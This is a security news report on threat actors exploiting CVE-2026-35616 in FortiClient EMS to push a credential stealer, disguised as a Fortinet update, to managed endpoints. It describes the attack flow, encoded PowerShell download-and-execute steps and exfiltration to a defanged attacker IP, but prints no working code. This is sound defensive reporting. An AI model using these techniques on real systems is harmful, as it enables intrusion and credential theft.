Threat Actors Exploit Critical FortiClient EMS Flaw to Deploy Credential Stealer

Source: The Hacker News

Exploited Vulnerability

The campaign targets CVE‑2026‑35616 – a pre‑authentication API access bypass that enables privilege escalation (CVSS 9.1). Fortinet addressed the issue in FortiClient EMS 7.4.7 and later.

“The campaign abused trusted endpoint management infrastructure to deliver malware across managed endpoints,” Arctic Wolf said. “Threat actors disguised the credential stealer payload as a Fortinet endpoint update, silently executing the malicious executable through PowerShell.”
— Arctic Wolf blog

Image: FortiClient EMS

Attack Flow

1. Configuration Manipulation – After compromising EMS, the actors modify settings to suppress firmware‑upgrade reminders and alter a Remote Access Profile and endpoint policy.
2. Malicious Script Injection – A PowerShell command is pushed through FortiClient’s legitimate management pathway, appearing as a normal update operation.
3. Execution on Endpoints – The injected script runs on each managed device without requiring a separate intrusion vector.

“The observed execution pattern suggests that threat actors used FortiClient’s own management pathway to push malicious PowerShell commands to managed endpoints in a way that resembled legitimate management operations,” Arctic Wolf added.

Image: PowerShell execution

Payload Details

• Legitimate executable: fortitray.exe (part of FortiClient) is used to launch a .cmd script via cmd.exe.
• Malicious script: The .cmd file runs a Base64‑encoded PowerShell command that downloads and executes a second payload, then exfiltrates data to 83.138.53[.]110 via an HTTP POST request.
• Stealer binary: FortiEndpoint_Patch.exe masquerades as a legitimate update but is an undocumented Windows information stealer. It harvests:
  • Passwords, cookies, and autofill data (credit cards, addresses, phone numbers) from Chromium‑ and Gecko‑based browsers.
  • The stolen data is written to a log file in the ProgramData directory.

“By bypassing API authentication and interacting with EMS functionality in a privileged context, threat actors were able to modify management configuration and push malicious scripts for execution on managed endpoints,” Arctic Wolf explained.

Image: ThreatLocker illustration

Impact

• Credential exposure: Session cookies and saved browser credentials can grant attackers access to cloud services, internal applications, and other authenticated resources, potentially bypassing MFA.
• Limited exfiltration: The stealer itself does not perform network exfiltration; the PowerShell component handles data transmission to the attacker‑controlled server.

References

• Arctic Wolf blog post on the FortiClient EMS exploitation.
• Details on CVE‑2026‑35616: https://thehackernews.com/2026/04/fortinet-patches-actively-exploited-cve.html
• Additional coverage: https://thehackernews.uk/threatlabz-vpn-risk-2026-d